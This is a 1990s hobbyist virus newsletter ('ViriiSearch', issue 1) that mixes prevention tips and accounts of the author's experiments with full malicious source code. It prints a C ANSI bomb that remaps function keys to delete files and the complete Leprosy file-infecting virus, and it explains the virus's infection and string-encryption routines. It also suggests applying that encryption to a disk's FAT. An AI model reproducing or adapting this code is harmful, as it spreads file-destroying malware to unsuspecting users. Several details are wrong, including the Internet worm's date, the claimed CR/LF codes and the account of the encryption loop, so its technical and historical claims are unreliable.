DISCLAIMER: The author will NOT accept responsibility for any damage to your computer media and/or files, or responsibility for any action you might take that will result in legal proceedings, the source code, if any, in this newsletter is THE REAL THING, and you, after you read this, will be well aware of what virii are capable of, and knowing that, it is expected that you will act responsibly. DISCLAIMER II: All I know about programming I have learned on my own, and did not go to school for, and am still learning. As a result, I am sometimes prone to make mistakes, and be wrong about things, so please be patient if I should make a mistake, or say something that isn't true, which would be totally unintentional. ViriiSearch ----------- The Virus Research Newsletter Volume 1, Number 1 CREDITS: ----------------------------------------------------------------------------- Author...................................................Criminal Minded Editor...................................................Criminal Minded Ideas, Source, Examples Supplied By......................Criminal Minded Facts Stolen From Several Sources By.....................Criminal Minded ----------------------------------------------------------------------------- Introduction: Welcome To The First Issue Of Viriisearch, The Virus Research Newsletter. I have always had a fascination of computer virii, since I first heard the word. I, like a lot of people, had no idea what they were about, and was extremely curious. And this newsletter will cover my process as I find out more about them. How they are written, why they act like they do, and if possible, why people would write them. In this issue: Prevention And Protection Methods The "Internet Worm" Trojans, Worms, Virii, Ansi Bombs: What's the difference? Benign VS Malignant Virii Sample Source Code Of Virii Discussion Of The Infection And Encryption Methods Used By "Leprosy" The "Uncompress" Virus "Suicidal Tendencies" Department/Virus Of The Month Discussion Of Anti Viral Software Things You Should Know ----------------------------------------------------------------------------- Prevention And Protection Methods: ----------------------------------------------------------------------------- After the infamous "Michelangelo" panic, I realized what the masses are lacking is virus literacy. If people had a understanding of them, and knew the appropriate methods of prevention, and dealing with a infection, the situation would've never been blown out of proportion like it was. When I hear people ask questions such as "If I Put My Toothbrush Near A Infected Disk, Will I Catch The Virus When I Brush My Teeth?" I have to laugh...Ok, maybe that example is a little exaggerated, but some of the questions are hitting close to that level of stupidity, so here are some protection and prevention methods: 1. If you download a file from a public BBS, or a friend gives you a file that he downloaded from somewhere, be sure and uncompress the file onto a floppy and run your virus scanner on it. NEVER run a new file without checking it first. Some people believe a virus scanner can spot a file that is infected within a compressed file by running the virus scanner on it, this is NOT true. You have to decompress the file first. By doing this, you are dropping your chances of infection considerably BUT there is always the chance of a unknown virus that the scanner won't spot so that is why you have to ALWAYS have a backup of all your data on tape or disk. That way if the unknown virus wipes your hard drive, you have the backup and nothing is lost. 2. In the event of a virus infection, shut your computer off immediately and wait 10-20 seconds. NEVER do a "warm boot" (CTRL-ALT-DEL) because some virii can survive through a warm boot. Always do a "cold boot" (Shut the computer OFF). After the 10-20 seconds, boot your computer from a CLEAN WRITE PROTECTED DOS Bootable disk, and then run your virus scanner from a WRITE PROTECTED disk. (The reason for having the disks write protected is just in case the virus is still lurking around, it won't be able to write itself and infect the floppies). If the virus is a known one, have the virus scanner either fix the infected files, or delete them (and replace from your backup) or make a note of the infected files and erase them manually. 3. How do you spot a attack by a unknown virus? A) Change in sizes of files B) Change of file dates/times C) Deleted files D) Slower processing time E) Unusual messages F) Disk activity, more than usual (Writing to the disk when it's not neccesary) 4. What to do in the event of a unknown virus attack? A) Follow steps of shutting machine off and re-booting as outlined in #2 B) Run your virus scanner and have it look for files that changed in size or date (if your scanner has a feature that makes note of original virus sizes/dates/times) C) If your virus scanner doesn't make note of original sizes/dates/times you can always make note of them manually and then check them yourself. It's time consuming, but can prevent serious damage to your data, and you should try to isolate a infected file and send it to ME (info on how to get it to me at the end of the newsletter) so I can attempt to dissect it and notify the appropriate person of the new virus. D) Some virus scanners come with a TSR that will prevent any writing to disk, it will pop a window or message on the screen saying: Attempting to write to Do you wish to do so? If something is trying to write to a file that shouldn't be written to at that time, chances are you are dealing with a unknown virus and should say no. Then try to find and isolate the virus. E) How do you spot a unknown virus or a known virus without running a virus scanner? 1) Most virii are tiny (2 kilobytes to 10 kilobytes) and the majority of them are .COM files so if you have, let's say, a 6K .COM file that claims to be a "awesome game" I'd be a little bit suspicious. 2) Weird names. I would not run "DIE.COM" or "KILLER.COM" and over the years I have run into files named that, when people tried to infect my computer. At least they could've named it something else not so obvious. 3) As stated in #1, the MAJORITY of them are small .COM files but they can be .EXE files as well, and bigger then 10K. All it takes is a little bit of common sense, and 99% of what could've been virus attacks on your computer can be prevented. All you have to remember is that they cannot infect your machine unless run first...BUT there is one virus out there that, when uncompressed, activates itself. This virus does NOT have to be executed in order to infect your machine, and it will be discussed later on. In the event of where this "uncompress" virus wipes some of your data, or any other virus, that's what backups are for. ALWAYS HAVE A BACKUP OF YOUR HARD DRIVE and NEVER put a floppy in the drive and run a program when there is a virus in memory because, chances are, that floppy will get ruined/infected as well, unless it is write protected. The instant you are aware of a infection, shut the machine off! Because there are some virii that, upon finding a write protected floppy that it cannot infect, or something else it can't do, "get mad" and cause destruction. ----------------------------------------------------------------------------- The "Internet Worm" ----------------------------------------------------------------------------- This has to be the most widely publicized case of a virus attack ever. On 10/02/88, Robert Morris Jr., a graduate student, wrote and released a worm that infected "Internet" the worldwide network. Within hours, it infected thousands of computers. The worm was benign, not causing any damage to files or media, but replicated itself over and over rapidly, and resulted in the computers on Internet having to be shut down and all copies of the worm removed. Some of the hosts were still disconnected from the network eight days later, showing the impact this worm had. Morris claimed he did it as a experiment, and made a mistake in how fast it actually would replicate. The media, namely NY Times, USA Today, and The Wall Street Journal, gave the worm front page coverage. On November 4th, teams at several institutions went to work and successfully "decompiled" the worm and studied it in the language it was written in, "C language", but the source code was never released for fear of hackers using the source for malicious purposes. In the end, Morris was removed from school, ordered to pay $10,000 in fines, perform 400 hours of community services and was on 3 years probation. Some people argued as to whether or not Morris was guilty because he evidently didn't do it to cause damage, but rather as a experiment that went wrong. What the worm did: It hacked it's way into hosts attached to the internet by cracking passwords and then replicated itself rapidly, taking up all the memory and forcing the hosts to be shut down. ----------------------------------------------------------------------------- Trojans, Worms, Virii, Ansi Bombs: What's the difference? ----------------------------------------------------------------------------- Trojans: Programs disguised as a useful program or a existing real program that can cause damage on your system. Worms: Benign virii, rarely causing damage to media or files, such as the Internet worm. Ansi Bombs: Tiny programs that use ANSI to remap your keyboard causing keys, when pressed, to do other things. Example: If a ansi bomb was in memory, and it remapped the "K" key to erase all the files in the current directory, as soon as you pressed K the files would be gone. Usually when you type C>ERASE *.* MS-DOS will respond with: All the files in the current directory will be deleted! Are you sure (y/n)? Some ansi bombs are intelligent and can prevent such DOS messages from appearing. ----------------------------------------------------------------------------- Here is the source code to a simple ansi bomb: ----------------------------------------------------------------------------- #include #define KILL(K, S) printf("\033[0;%d;\"%s\";13p", K, S) #define F1 59 #define F2 60 #define F3 61 #define F4 62 main() { KILL(F1, "DEL *.ZIP"); KILL(F2, "DEL *.ARJ"); KILL(F3, "DEL *.COM"); KILL(F4, "DEL *.EXE"); } ----------------------------------------------------------------------------- This just assigns the string (DEL *.ZIP etc) to the respective keys. If this ansi bomb was in memory, and you pressed F1, it would delete all the files in the current directory with the extension of .ZIP. The command (DEL *.ZIP) would appear on the screen though, and you could use a file recovery program to recover the deleted files. There are more lethal ansi bombs, ones that can format your hard drive and other such destructive acts. Prevention: Use NANSI or ZANSI rather than ANSI and the ansi bombs won't work. ----------------------------------------------------------------------------- Virii: Destructive programs that use 'stealth' techniques, and can replicate. Not All virii are destructive, some can be benign, and just pop up annoying messages time to time or slow down system speed. ----------------------------------------------------------------------------- No more will be discussed of ANSI Bombs or Trojans as this newsletter is dedicated entirely to virii. ----------------------------------------------------------------------------- Benign VS Malignant Virii: ----------------------------------------------------------------------------- Benign Virii do not cause damage but do things such as take up all the memory, slow processing speed down, and send annoying messages to the console, or the printer, etc... Maligant, or Malicious, Virii cause actual destruction, deleting files, destroying the FAT or boot sector, locking up the computer, formatting disks or hard drives, etc... ----------------------------------------------------------------------------- Virus Source Code: ----------------------------------------------------------------------------- Now for the real thing, we will start with the C Language source code to the "Leprosy" Virus. ----------------------------------------------------------------------------- #pragma inline #define CRLF "\x17\x14" /* CR/LF combo encrypted. */ #define NO_MATCH 0x12 /* No match in wildcard search. */ char fake_msg[] = CRLF "Z|yq|kw*~yy*lsq*~y*ps~*sx*wowy|\x83."; char *virus_msg[3] = { CRLF "\x13XOa]*PVK]R++**cy\x7f|*}\x83}~ow*rk}*loox*sxpom~on*\x81s~r*~ro.", CRLF "\x13sxm\x7f|klvo*nomk\x83*yp*VOZ\\Y]c*;8::6*k*\x80s|\x7f}*sx\x80ox~on*l\x83.", CRLF "\x13ZMW<*sx*T\x7fxo*yp*;CC:8**Qyyn*v\x7fmu+\x17\x14." }; struct _dta /* Disk Transfer Area format for find. */ { char findnext[21]; char attribute; int timestamp; int datestamp; long filesize; char filename[13]; } *dta = (struct _dta *) 0x80; /* Set it to default DTA. */ const char filler[] = "XX"; /* Pad file length to 666 bytes. */ const char *codestart = (char *) 0x100; /* Memory where virus code begins. */ const int virus_size = 666; /* The size in bytes of the virus code. */ const int infection_rate = 4; /* How many files to infect per run. */ char compare_buf[20]; /* Load program here to test infection. */ int handle; /* The current file handle being used. */ int datestamp, timestamp; /* Store original date and time here. */ char diseased_count = 0; /* How many infected files found so far. */ char success = 0; /* How many infected this run. */ /* The following are function prototypes, in keeping with ANSI */ /* Standard C, for the support functions of this program. */ int find_first( char *fn ); int find_healthy( void ); int find_next( void ); int healthy( void ); void infect( void ); void close_handle( void ); void open_handle( char *fn ); void print_s( char *s ); void restore_timestamp( void ); /*----------------------------------*/ /* M A I N P R O G R A M */ /*----------------------------------*/ int main( void ) { int x = 0; do { if ( find_healthy() ) { /* Is there an un-infected file? */ infect(); /* Well, then infect it! */ x++; /* Add one to the counter. */ success++; /* Carve a notch in our belt. */ } else { /* If there ain't a file here... */ _DX = (int) ".."; /* See if we can step back to */ _AH = 0x3b; /* the parent directory, and try */ asm int 21H; /* there. */ x++; /* Increment the counter anyway, to */ } /* avoid infinite loops. */ } while( x < infection_rate ); /* Do this until we've had enough. */ if ( success ) /* If we got something this time, */ print_s( fake_msg ); /* feed 'em the phony error line. */ else if ( diseased_count > 6 ) /* If we found 6+ infected files */ for( x = 0; x < 3; x++ ) /* along the way, laugh!! */ print_s( virus_msg[x] ); else print_s( fake_msg ); /* Otherwise, keep a low profile. */ return; } void infect( void ) { _DX = (int) dta->filename; /* DX register points to filename. */ _CX = 0x00; /* No attribute flags are set. */ _AL = 0x01; /* Use Set Attribute sub-function. */ _AH = 0x43; /* Assure access to write file. */ asm int 21H; /* Call DOS interrupt. */ open_handle( dta->filename ); /* Re-open the healthy file. */ _BX = handle; /* BX register holds handle. */ _CX = virus_size; /* Number of bytes to write. */ _DX = (int) codestart; /* Write program code. */ _AH = 0x40; /* Set up and call DOS. */ asm int 21H; restore_timestamp(); /* Keep original date & time. */ close_handle(); /* Close file. */ return; } int find_healthy( void ) { if ( find_first("*.EXE") != NO_MATCH ) /* Find EXE? */ if ( healthy() ) /* If it's healthy, OK! */ return 1; else while ( find_next() != NO_MATCH ) /* Try a few more otherwise. */ if ( healthy() ) return 1; /* If you find one, great! */ if ( find_first("*.COM") != NO_MATCH ) /* Find COM? */ if ( healthy() ) /* If it's healthy, OK! */ return 1; else while ( find_next() != NO_MATCH ) /* Try a few more otherwise. */ if ( healthy() ) return 1; /* If you find one, great! */ return 0; /* Otherwise, say so. */ } int healthy( void ) { int i; datestamp = dta->datestamp; /* Save time & date for later. */ timestamp = dta->timestamp; open_handle( dta->filename ); /* Open last file located. */ _BX = handle; /* BX holds current file handle. */ _CX = 20; /* We only want a few bytes. */ _DX = (int) compare_buf; /* DX points to the scratch buffer. */ _AH = 0x3f; /* Read in file for comparison. */ asm int 21H; restore_timestamp(); /* Keep original date & time. */ close_handle(); /* Close the file. */ for ( i = 0; i < 20; i++ ) /* Compare to virus code. */ if ( compare_buf[i] != *(codestart+i) ) return 1; /* If no match, return healthy. */ diseased_count++; /* Chalk up one more fucked file. */ return 0; /* Otherwise, return infected. */ } void restore_timestamp( void ) { _AL = 0x01; /* Keep original date & time. */ _BX = handle; /* Same file handle. */ _CX = timestamp; /* Get time & date from DTA. */ _DX = datestamp; _AH = 0x57; /* Do DOS service. */ asm int 21H; return; } void print_s( char *s ) { char *p = s; while ( *p ) { /* Subtract 10 from every character. */ *p -= 10; p++; } _DX = (int) s; /* Set DX to point to adjusted string. */ _AH = 0x09; /* Set DOS function number. */ asm int 21H; /* Call DOS interrupt. */ return; } int find_first( char *fn ) { _DX = (int) fn; /* Point DX to the file name. */ _CX = 0xff; /* Search for all attributes. */ _AH = 0x4e; /* 'Find first' DOS service. */ asm int 21H; /* Go, DOS, go. */ return _AX; /* Return possible error code. */ } int find_next( void ) { _AH = 0x4f; /* 'Find next' function. */ asm int 21H; /* Call DOS. */ return _AX; /* Return any error code. */ } void open_handle( char *fn ) { _DX = (int) fn; /* Point DX to the filename. */ _AL = 0x02; /* Always open for both read & write. */ _AH = 0x3d; /* "Open handle" service. */ asm int 21H; /* Call DOS. */ handle = _AX; /* Assume handle returned OK. */ return; } void close_handle( void ) { _BX = handle; /* Load BX register w/current file handle. */ _AH = 0x3e; /* Set up and call DOS service. */ asm int 21H; return; } ----------------------------------------------------------------------------- With source code discussed in this newsletter, main areas covered will be on encryption techniques, how the virus infects files, how they 'replicate' and 'breed' and how 'stealth techniques' are implemented in the code. In this case we will cover how the virus infects the files and encrypts. ----------------------------------------------------------------------------- Infection Method: ----------------------------------------------------------------------------- void infect( void ) { _DX = (int) dta->filename; /* DX register points to filename. */ _CX = 0x00; /* No attribute flags are set. */ _AL = 0x01; /* Use Set Attribute sub-function. */ _AH = 0x43; /* Assure access to write file. */ asm int 21H; /* Call DOS interrupt. */ open_handle( dta->filename ); /* Re-open the healthy file. */ _BX = handle; /* BX register holds handle. */ _CX = virus_size; /* Number of bytes to write. */ _DX = (int) codestart; /* Write program code. */ _AH = 0x40; /* Set up and call DOS. */ asm int 21H; restore_timestamp(); /* Keep original date & time. */ close_handle(); /* Close file. */ return; } ----------------------------------------------------------------------------- void infect( void ) is just what he named this function. The function will return nothing, and be called with no parameters as the two "voids" suggest. Register DX points to the filename as declared in the structure "_dta" ----------------------------------------------------------------------------- _dta structure: ----------------------------------------------------------------------------- struct _dta { char findnext[21]; char attribute; int timestamp; int datestamp; long filesize; char filename[13]; } *dta = (struct _dta *) 0x80; ----------------------------------------------------------------------------- Next in the "infect" function, 0x00 is assigned to the CX register. With function 43H in assembly, register CX is assigned with the bit of the attribute that you want to set the file to. Bit: Attribute: 0 Read Only 1 Hidden 2 System 3-4 Reserved 5 Archive 6-15 Reserved Because the author assigned 0x00 to CX, none of the above attributes were set on the file, allowing it to be written to. Next in the "infect" function is 0x01 being assigned to register AL 0x01 is telling the program we want to SET attributes. Then following that is: 0x43 being assigned to AH Which is telling the program we want to use function 43H (Get/Set Attributes) The current handle is assigned to register BX The size of the virus code, or the number of bytes to write, stored in the integer "virus_size" is assigned to register CX virus_size is declared and initialized at the beginning of the source code as a integer with the value "666" Then the virus code is written to the file, the file is closed and the original date and time the file had are restored. ----------------------------------------------------------------------------- The Method Of Encryption: ----------------------------------------------------------------------------- void print_s( char *s ) { char *p = s; while ( *p ) { /* Subtract 10 from every character. */ *p -= 10; p++; } _DX = (int) s; /* Set DX to point to adjusted string. */ _AH = 0x09; /* Set DOS function number. */ asm int 21H; /* Call DOS interrupt. */ return; } ----------------------------------------------------------------------------- The above function used in "Leprosy", called "print_s" accepts one parameter, a string of text, like these ones defined at the beginning of the Leprosy source code: ----------------------------------------------------------------------------- char *virus_msg[3] = { CRLF "\x13XOa]*PVK]R++**cy\x7f|*}\x83}~ow*rk}*loox*sxpom~on*\x81s~r*~ro.", CRLF "\x13sxm\x7f|klvo*nomk\x83*yp*VOZ\\Y]c*;8::6*k*\x80s|\x7f}*sx\x80ox~on*l\x83.", CRLF "\x13ZMW<*sx*T\x7fxo*yp*;CC:8**Qyyn*v\x7fmu+\x17\x14." }; ----------------------------------------------------------------------------- Note: CRLF is defined as "\x17\x14" at the beginning of the source, \x17 being the hexadecimal code for a carriage return and \x14 the code for a line feed. ----------------------------------------------------------------------------- When a string is passed to the "print_s" function, it is un-encrypted. print_s(virus_msg[0]); print_s(virus_msg[1]); print_s(virus_msg[2]); would result in the following being printed to the screen: ------------------------------------------------------------ NEWS FLASH!! Your system has been infected with the incurable decay of LEPROSY 1.00, a virus invented by PCM2 in June of 1990. Good luck! ----------------------------------------------------------- The compiler I currently use does not accept inline assembly code as the author of leprosy had in his source so I modified the "print_s" function so I could compile it: For those interested, I use Microsoft Quick C (C) Microsoft ----------------------------------------------------------- /* NOTE: I removed the . from the end of each message because that is */ /* A $ when un-encrypted, and the $ to terminate the string is only */ /* required for the assembly version of the "print_s" function */ /* Also: The hexadecimal constants in the strings are as follows: */ /* \x13 = TAB, \x7f = u, \x83 = y, \x81 = w, \x80 = v */ #include #define CRLF "\x17\x14" char *virus_msg[3] = { CRLF "\x13XOa]*PVK]R++**cy\x7f|*}\x83}~ow*rk}*loox*sxpom~on*\x81s~r*~ro", CRLF "\x13sxm\x7f|klvo*nomk\x83*yp*VOZ\\Y]c*;8::6*k*\x80s|\x7f}*sx\x80ox~on*l\x83", CRLF "\x13ZMW<*sx*T\x7fxo*yp*;CC:8**Qyyn*v\x7fmu+\x17\x14" }; void print_s (char *s); int main (void); main() { print_s(virus_msg[0]); print_s(virus_msg[1]); print_s(virus_msg[2]); } void print_s (char *s) { char *p = s; while ( *p ) { *p -= 10; p++; } printf("%s\n",s); } ----------------------------------------------------------------------------- *p -= 10; is what does it all. It adds the value of 10 to each character and can be used either way, to unencrypt or to encrypt. if you change it to: *p += 10; it will then encrypt. You can also change it to: *p -= rand() % 35000; /* #include for "rand()" */ and it will change the value it uses to encrypt or un-encrypt everytime it passes through the "while" loop or you can change it to any value you like. ----------------------------------------------------------------------------- This method of encryption can be used to encrypt files, file allocation tables, boot sectors, etc. All you need is a function that reads and writes either of the three. For instance, read the contents of the File Allocation Table, and pass the string(s) through the print_s function and then write the encrypted string(s) back to the File Allocation Table. I don't suggest doing this to your hard drive, or anyone elses, for it will result in either you or the other person having to crack the encryption and restore the FAT manually, or formatting the hard drive and replacing all the files. If you want to experiment, do it on a floppy, like I did. ----------------------------------------------------------------------------- The "uncompress" virus ----------------------------------------------------------------------------- According to the person who uploaded it to the BBS where I got it from, this virus infects when you uncompress the file. I did not find any indication of this when I uncompressed the file, called NJERU.ARJ. It is a Arkanoid II: Revenge Of Doh crack released by FiRM that is infected with a strain of Jerusalem-4. I ran it and Norton Anti Virus (C) Symantec reported the virus in memory. I then proceeded to run EDLIN.EXE (C) Microsoft, SYS.COM (C) Microsoft, COMMAND.COM (C) Microsoft, and ARJ.EXE (C) Robert K. Jung to see what would happen. These are the results: Filename: Original Size: Size After Infection: EDLIN.EXE 14,121 bytes 15,936 bytes ARJ.EXE 98,968 bytes 100,784 bytes SYS.COM 13,440 bytes 15,253 bytes There were no size changes to COMMAND.COM, nor was it infected. A file was also created by the virus called "NJVR._OO" that was around 26K but only had one line in it, a error message concerning the media of the disk. Sorry, the exact size of the file NVJR._OO and the exact message are not available. When I attempted to remove the apparent text file using the MS-DOS "DEL" command, it displayed the error message and tried to write to drive A which was write protected at the time. Then it went back to drive B and apparently did damage to the media. I formatted the disk and it was fine afterwards. I have never seen anything like this before, a text file being able to do damage just by attempting to delete it. I guess it wasn't a text file after all but I still have no idea how it managed to corrupt the media on drive B. It also created a file called "N" which was 0 bytes and couldn't be deleted or read by Norton Anti Virus. ----------------------------------------------------------------------------- "Suicidal Tendencies" Department. (Appropriately named department: I can't believe I am deliberately running a virus on my system) This section of the newsletter will cover what happened when I run a virus on a floppy with MSDOS.SYS, IO.SYS, COMMAND.COM, a overlay file, a .EXE file and a few other assorted files on it. The virus of the month award goes to: The Perfume Virus ----------------------------------------------------------------------------- What Happened: ----------------------------------------------------------------------------- Filename: PERFUME.COM Filesize: 806 bytes Ok, I placed this file on drive B with the following files: Filename: Original Size: ---------------------------------- COMMAND.COM 47845 MSDOS.SYS 37394 IO.SYS 33430 ANSI.SYS 9029 RAMDRIVE.SYS 5873 CONFIG.SYS 39 UNDELETE.EXE 13924 AUTOEXEC.BAT 69 15ALL05.DEF 67278 MICHEL.DEF 456 NSETUP.OVL 876 PKUNZIP.EXE 23528 ---------------------------------- When I ran PERFUME.COM, it displayed the message: This is a tiny COM program. and it infected COMMAND.COM, enlarging it by 765 bytes to 48,610 bytes. It then proceeded to remove the hidden/system attribute from MSDOS.SYS but didn't infect it and then attempted to infect the disk in drive A, which was write protected at the time. The virus, realizing it couldn't write to drive A, displayed the message: Not ready reading drive A Insert disk with \COMMAND.COM in drive A Press any key to continue . . . Now, usually when DOS displays that message, it only needs to READ, and still could've if the disk was write protected, so evidently the virus was trying to outsmart me and fool me into thinking that was a DOS message so it could infect at least one more disk. I ran Norton Anti Virus v2.0 (C) Symantec, and it reported Perfume in memory so I re-booted and ran NAV again, this time it didn't report the virus being in memory, but did identify COMMAND.COM and PERFUME.COM as being infected. Also: In my search for the virus of the month, I came across a file called "ISRAELI.ZIP" which I thought to be a virus called "Israeli" but as it turns out it was a strain of Jerusalem-4, the same as the supposed "Uncompress virus" discussed earlier. The file was called: SORTINFT.EXE and was 3760 bytes. When I ran it, it did no damage to the disk or files but NAV did report Jerusalem-4 in memory so I re-booted. I then ran NAV again and when the screen came up saying who the copy of NAV was registered to, it said: Registered To: Criminal Mi��ed Viriisearch Ne��letter, Inc. Weird eh? And that's not all, I went to scan memory, and the little window came up that it displays the name of the current virus being scanned for, but that's it, no names were displayed. The program appeared to freeze up, and the disk kept spinning with the drive light on. I re-booted once again and ran NAV again. The weird letters were still there but it scanned memory no problem this time. I exited it from NAV and went to drive B to delete files when I noticed a file called: NRVN E._OO that was 4096 bytes long. Since when does DOS allow spaces in filenames? As a result I couldn't view it or delete it by typing: C>DEL NRVN E._OO so I typed: C>DEL *._OO and that worked. At one point a message also came up on the screen: "File Allocation Table Bad, Drive B". I imagine Jerusalem-4 was responsible for the weird file name and the bad FAT on drive B. I have no idea why NAV was acting funny, possibly a genuine disk error and not due to a virus, since the disk was always write protected. ----------------------------------------------------------------------------- Well, that's it for "Suicidal Tendencies" for this month! I don't recommend trying this on any computer with a hard drive. I do not have a hard drive on the machine I do my experimenting on, so if I am careful and keep the virus isolated to one disk, I have nothing to worry about. ----------------------------------------------------------------------------- Anti Viral Software: ----------------------------------------------------------------------------- Here are some nice virus scanners/anti viral programs to check out: ----------------------------------------------------------------------------- Scan v89b (C) McAfee - available on most Public Domain BBSes Clean v89b (C) McAfee - available on most Public Domain BBSes Norton Anti Virus v2.0 (C) Symantec Central Point Anti Virus (C) Central Point Software There are a few others, but I think the above four are the best. I use Norton Anti Virus and Scan. ----------------------------------------------------------------------------- Some things you should know: ----------------------------------------------------------------------------- Most people assume that a hard drive in a newly purchased computer, or a new program still in the shrinkwrap are always virus free. Well, this is just not true. The reported cases are few and far in between, but today anything can happen, and it has. A certain computer company shipped out 500 of their computers infected with the Michaelangelo virus, which started the whole panic in the first place. And there have been a few times where someone bought a brand new program, took it home and started using it, not expecting it to be infected with a virus. Well, it was. After all, people create virii and people work at computer companies, and software distributors. So what's stopping a pissed off employee from infecting a computer or a program? Nothing at all. How you take this information is entirely up to you. If you call a BBS and they say they scan for virii, don't assume that every single file will be virus free, some can sneak through. There is also the possibility of a unknown virus that was not detected by the scanner. Last but not least: ALWAYS BACK UP YOUR DATA!!! Philosophy Dept: "Knowledge is power" - Francis Bacon, 16th Century Philosopher "Even if a computer is locked, sealed in concrete, placed in a lead room and surrounded by armed guards, I'd still have my doubts." Those aren't the exact words and I forget who said that, but it is quite appropriate and all too true. I hope you enjoyed this issue of "Viriisearch" The newsletter dedicated entirely to computer virii. Until Next Time......Be Careful!!! * Criminal Minded * ----------------------------------------------------------------------------- Downloaded From P-80 International Information Systems 304-744-2253